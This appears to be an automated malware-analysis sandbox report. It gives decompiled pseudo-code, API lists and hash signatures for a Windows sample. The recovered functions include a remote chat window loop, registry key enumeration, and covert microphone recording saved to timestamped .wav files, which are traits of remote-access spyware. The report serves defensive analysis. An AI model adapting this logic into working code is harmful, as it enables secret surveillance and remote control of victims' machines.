                                        				_t97 =  *_t29 - 0x3a;
                                        				if(_t97 == 0) {
                                        					_t35 = E0040180C( &_v28, __eflags, 0);
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					_t62 = E00406DD9(_t35);
                                        					__eflags = _t62;
                                        					if(_t62 == 0) {
                                        						L12:
                                        						E004017DD( &_v28);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__eflags = 0;
                                        						return 0;
                                        					}
                                        					 *0x41b794 = E00407033(_t62, "DisplayMessage");
                                        					 *0x41b798 = E00407033(_t62, "GetMessage");
                                        					_t41 = E00407033(_t62, "CloseChat");
                                        					_t105 = _t104 + 8;
                                        					 *0x41b79c = _t41;
                                        					 *0x41b790 = 1;
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        					E004020C2(_t95, 0x74, 0x41b738);
                                        					L10:
                                        					_t63 = HeapCreate(0, 0, 0);
                                        					_t45 =  *0x41b798(_t63,  &_v12);
                                        					__eflags = _t45;
                                        					if(_t45 != 0) {
                                        						_t105 = _t105 - 0x10;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
                                        						E004020C2(_t95, 0x3b, _v12);
                                        						HeapFree(_t63, 0, _v12);
                                        					}
                                        					goto L10;
                                        				}
                                        				_t109 = _t97 != 1;
                                        				if(_t97 != 1) {
                                        					goto L12;
                                        				}
                                        				_t50 = E00412881( &_v92);
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
                                        				_t51 =  *0x41b794(_t50);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_t51 == 0) {
                                        					goto L12;
                                        				}
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
                                        				E00412855( &_v60, _t104 - 0x10,  &_v60);
                                        				E004020C2(_t95, 0x3b, 0x41576c);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				L4:
                                        				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
                                        					if(__eflags >= 0) {
                                        						goto L12;
                                        					}
                                        				}
                                        				TranslateMessage( &_v120);
                                        				DispatchMessageA( &_v120);
                                        				goto L4;
                                        			}
                                        0x0040295e
                                        0x00402967
                                        0x00402971
                                        0x0040297a
                                        0x00402983
                                        0x0040299b
                                        0x004029ab
                                        0x004029ba
                                        0x004029c4
                                        0x004029c9
                                        0x004029cc
                                        0x004029cf
                                        0x00402a80
                                        0x00402a87
                                        0x00402a93
                                        0x00402a96
                                        0x00402a98
                                        0x00402b33
                                        0x00402b36
                                        0x00402b3e
                                        0x00402b47
                                        0x00402b4f
                                        0x00402b53
                                        0x00402b53
                                        0x00402aaf
                                        0x00402abf
                                        0x00402ac4
                                        0x00402ac9
                                        0x00402acc
                                        0x00402ad3
                                        0x00402adf
                                        0x00402ae9
                                        0x00402aee
                                        0x00402af7
                                        0x00402afe
                                        0x00402b05
                                        0x00402b08
                                        0x00402b0a
                                        0x00402b17
                                        0x00402b21
                                        0x00402b2b
                                        0x00402b2b
                                        0x00000000
                                        0x00402b08
                                        0x004029d5
                                        0x004029d6
                                        0x00000000
                                        0x00000000
                                        0x004029ec
                                        0x004029f5
                                        0x004029fc
                                        0x00402a08
                                        0x00402a10
                                        0x00000000
                                        0x00000000
                                        0x00402a22
                                        0x00402a32
                                        0x00402a3d
                                        0x00402a45
                                        0x00000000
                                        0x00402a4b
                                        0x00402a72
                                        0x00000000
                                        0x00000000
                                        0x00402a78
                                        0x00402a60
                                        0x00402a6a
                                        0x00000000

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                        • SetEvent.KERNEL32(?), ref: 0040297A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 0040299B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 004029AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                        • GetMessageA.USER32 ref: 00402A52
                                        • TranslateMessage.USER32(?), ref: 00402A60
                                        • DispatchMessageA.USER32 ref: 00402A6A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                        • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                        • API String ID: 1701728818-749203953
                                        • Opcode ID: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                        • Opcode Fuzzy Hash: 78cabc971eb8825b31cfd8cf90bdfcb476906dc19c985b55c530726c243df69e
                                        • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
                                        				void* _v8;
                                        				char _v24;
                                        				char _v40;
                                        				char _v56;
                                        				char _v72;
                                        				char _v88;
                                        				char _v104;
                                        				char _v120;
                                        				char _v136;
                                        				char _v152;
                                        				void* _t28;
                                        				long _t29;
                                        				void* _t35;
                                        				char* _t38;
                                        				char* _t39;
                                        				char* _t40;
                                        				char* _t41;
                                        				char* _t42;
                                        				char* _t43;
                                        				char* _t44;
                                        				void* _t54;
                                        				void* _t56;
                                        				char* _t73;
                                        				char* _t74;
                                        				void* _t77;
                                        				void* _t79;
                                        
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                        				_t28 = E0040BD9B( &_a4);
                                        				_t79 = _t77 - 0x10 + 0x10;
                                        				_t47 = 0;
                                        				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
                                        				_t90 = _t29;
                                        				if(_t29 != 0) {
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
                                        					E004020C2(0x41bde0, 0x72, "3");
                                        				} else {
                                        					E0040BB20( &_v8, _t90, _v8);
                                        					_pop(_t54);
                                        					_t73 = "0";
                                        					if(_a24 != 0) {
                                        						_t73 = "1";
                                        					}
                                        					_t74 =  &E0041B310;
                                        					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
                                        					_t56 = _t74;
                                        					_t38 =  &_v88;
                                        					L00414176();
                                        					_t39 =  &_v56;
                                        					L00414140();
                                        					_t40 =  &_v40;
                                        					L00414140();
                                        					_t41 =  &_v24;
                                        					L00414140();
                                        					_t42 =  &_v72;
                                        					L00414140();
                                        					_t43 =  &_v104;
                                        					L00414140();
                                        					_t44 =  &_v136;
                                        					L00414140();
                                        					L00414140();
                                        					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, _t74, E00412855(_t56,  &_v120, 0x41be40), _t74, _t35, 0x41be30, _t74, 0x41be50);
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
                                        					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                        					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                        					RegCloseKey(_v8);
                                        					_t47 = 1;
                                        				}
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t47;
                                        			}

                                        0x0040be49
                                        0x0040be4f
                                        0x0040be54
                                        0x0040be5a
                                        0x0040be67
                                        0x0040be6d
                                        0x0040be6f
                                        0x0040bfea
                                        0x0040bff7
                                        0x0040be75
                                        0x0040be78
                                        0x0040be80
                                        0x0040be81
                                        0x0040be86
                                        0x0040be88
                                        0x0040be88
                                        0x0040be90
                                        0x0040beaf
                                        0x0040beb5
                                        0x0040beca
                                        0x0040becf
                                        0x0040bed8
                                        0x0040bedc
                                        0x0040bee5
                                        0x0040bee9
                                        0x0040bef2
                                        0x0040bef6
                                        0x0040beff
                                        0x0040bf03
                                        0x0040bf0c
                                        0x0040bf10
                                        0x0040bf19
                                        0x0040bf20
                                        0x0040bf2a
                                        0x0040bf39
                                        0x0040bf44
                                        0x0040bf4d
                                        0x0040bf56
                                        0x0040bf5f
                                        0x0040bf68
                                        0x0040bf71
                                        0x0040bf7a
                                        0x0040bf83
                                        0x0040bf8f
                                        0x0040bfa0
                                        0x0040bfac
                                        0x0040bfbd
                                        0x0040bfc9
                                        0x0040bfd2
                                        0x0040bfd8
                                        0x0040bfd8
                                        0x0040bfff
                                        0x0040c00b

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                          • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                          • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                        • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                          • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                          • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                          • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                          • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                          • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                        • String ID:
                                        • API String ID: 3909728815-0
                                        • Opcode ID: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                        • Opcode Fuzzy Hash: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			E00401640(void* __edx, intOrPtr _a8, char _a11) {
                                        				char _v5;
                                        				char _v12;
                                        				void* _v28;
                                        				char _v44;
                                        				char _v60;
                                        				char _v76;
                                        				char _v92;
                                        				char _v108;
                                        				char _v188;
                                        				int _t23;
                                        				char* _t25;
                                        				char* _t32;
                                        				char* _t33;
                                        				char* _t34;
                                        				CHAR* _t36;
                                        				intOrPtr _t37;
                                        				void* _t56;
                                        
                                        				_t23 =  &_v5;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
                                        				if(_a8 == 0x3c0) {
                                        					__imp__time( &_v12, _t56);
                                        					_t25 =  &_v12;
                                        					__imp__localtime(_t25);
                                        					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
                                        					_t32 =  &_v76;
                                        					L00414152();
                                        					_t33 =  &_v108;
                                        					L0041414C();
                                        					_t34 =  &_v60;
                                        					L00414146();
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					E004013BE(_t34, 0x41b1a0);
                                        					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					0x41b1a0->lpData = _t36;
                                        					_t37 =  *0x41b1d8; // 0x0
                                        					 *0x41b1a4 = _t37;
                                        					 *0x41b1a8 = 0;
                                        					 *0x41b1ac = 0;
                                        					 *0x41b1b0 = 0;
                                        					 *0x41b1b4 = 0;
                                        					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                        					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t23;
                                        			}

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                        • time.MSVCRT ref: 00401668
                                        • localtime.MSVCRT ref: 00401672
                                        • strftime.MSVCRT ref: 00401687
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
